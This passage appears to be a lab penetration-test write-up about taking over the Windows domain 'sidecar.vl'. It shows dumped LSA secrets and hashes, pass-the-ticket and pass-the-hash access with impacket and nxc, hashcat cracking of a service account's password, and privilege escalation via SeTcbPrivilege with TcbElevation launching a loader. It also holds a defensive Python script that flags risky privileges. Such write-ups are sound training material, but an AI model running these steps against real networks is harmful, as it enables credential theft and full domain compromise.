SIDECAR\WS01$:plain_password_hex:1880a0f624b99fb13150deef1afba09a3590e0e778518cb3cb48cdb23b1ab50c87bba5ce15d4b7c3d0decaad51e242b0d852f85f7672ae293c87d5412a1ea19751c0ad8b496ea343aeaf428b1b04a22e5066b7d2665da598e5dfafa827df1e5e916c1a65ea28acc6a9d9caf8bdf021760d6581f550cfe932dfe842eee145bd0ebcb64f0841825d0ed65c2a9c2a7c131b2a3e614070d89d480e7996a8cbfb28996f6c3df4155641ffda9caf6d014499cec3d7520de7418f977465a42be2cc1e73447d213ae782f119ff8b9d01c8517f1447ca6b5fa42349086ecdb67c949b7fa36fa05a3d6c38fa5440bf08c82db6db10
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:31fc45654028564d0ceda3817829d52f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5f9303f91320d51860ac3a1313e79027a226ec34
dpapi_userkey:0x21fd9a9c71f6b32d717142ca71212c70c33bf4d3
[*] NL$KM
0000 48 35 C4 FE DA 3E 65 75 57 78 B9 E8 26 12 99 AD H5...>euWx..&...
0010 C3 C9 10 90 E7 7E 77 ED 91 66 BB 10 28 15 FF 24 .....~w..f..(..$
0020 6E 20 0C A9 6A A1 82 8D EA 3E FC B5 DB 18 F9 0B n ..j....>......
0030 3C 62 FD 18 AE 7C B4 C5 AA 06 E6 4E D9 1F 27 85 <b...|.....N..'.
NL$KM:4835c4feda3e65755778b9e8261299adc3c91090e77e77ed9166bb102815ff246e200ca96aa1828dea3efcb5db18f90b3c62fd18ae7cb4c5aa06e64ed91f2785
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Obtaining a shell as Administrator
❯ KRB5CCNAME='administrator.ccache' impacket-wmiexec -k -no-pass WS01.sidecar.vl -shell-type powershell
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> C:\Temp\Loader.exe

Compromising domain controller
Initial Foothold on DC01
Discovering a valid domain user
During enumeration, the tester found the domain user svc_deploy, which appears similar to the local user Deployer found on WS01. This could indicate that they are the same user and may share the same credentials.

❯ nxc smb DC01 -u 'svc_deploy' -H 'c5ad69fd899918450831c9d2b23f27a1'
SMB 10.10.220.53 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB 10.10.220.53 445 DC01 [+] Sidecar.vl\svc_deploy:c5ad69fd899918450831c9d2b23f27a1
❯ nxc winrm DC01 -u 'svc_deploy' -H 'c5ad69fd899918450831c9d2b23f27a1'
WINRM 10.10.220.53 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:Sidecar.vl)
WINRM 10.10.220.53 5985 DC01 [+] Sidecar.vl\svc_deploy:c5ad69fd899918450831c9d2b23f27a1 (Pwn3d!)
Cracking svc_deploy's NTLM hash
❯ hashcat -m 1000 'c5ad69fd899918450831c9d2b23f27a1' /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
c5ad69fd899918450831c9d2b23f27a1:Aces&Eights
Found: svc_deploy:Aces&Eights
Compromising the domain controller via SeTcbPrivilege
Discovering SeTcbPrivilege token privilege enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
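To audit what a service account such as svc_deploy has been granted, the following added Python (not from these notes) parses `whoami /priv` output and flags the privileges that on their own allow a local or domain take-over. The input is the output shown above embedded as a constant, and the set of privileges treated as high risk is this example's own list.

```python
# Constructed sample: the `whoami /priv` output captured on DC01 above, as text.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeTcbPrivilege                Act as part of the operating system Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
"""

# Privileges that by themselves let the holder escalate (this example's own list).
HIGH_RISK = {
    "SeTcbPrivilege": "act as part of the OS: can create logon tokens for any account",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate authenticated clients",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of ACL (registry hives, NTDS.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
}


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    The table body starts after the '=====' separator line. Each row is
    '<Name> <Description with spaces> <State>', so the privilege name is the
    first token and the state the last one.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        parts = line.split()
        if not in_table or len(parts) < 2:
            continue
        name, state = parts[0], parts[-1]
        if state in ("Enabled", "Disabled"):
            privs[name] = state
    return privs


def high_risk_privileges(text):
    """(name, state, reason) for every held privilege on the HIGH_RISK list.

    A Disabled privilege still counts: it is held by the token and the process
    can enable it at any time; only removing it from the account's user-rights
    assignment takes it away.
    """
    return [(name, state, HIGH_RISK[name])
            for name, state in parse_whoami_priv(text).items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, reason in high_risk_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {reason}")
```

For svc_deploy the only hit is SeTcbPrivilege, which is the user-rights assignment ("Act as part of the operating system") to remove from the account; the other three privileges in the capture are granted to every authenticated user by default.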
Abusing SeTcbPrivilege via TcbElevation
Script: https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178
#Compile: Open Developer Command prompt for VS
cl TcbElevation.cpp /D_UNICODE /DUNICODE /EHsc /link Secur32.lib Advapi32.lib
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe rev C:\Users\svc_deploy\Documents\Loader.exe
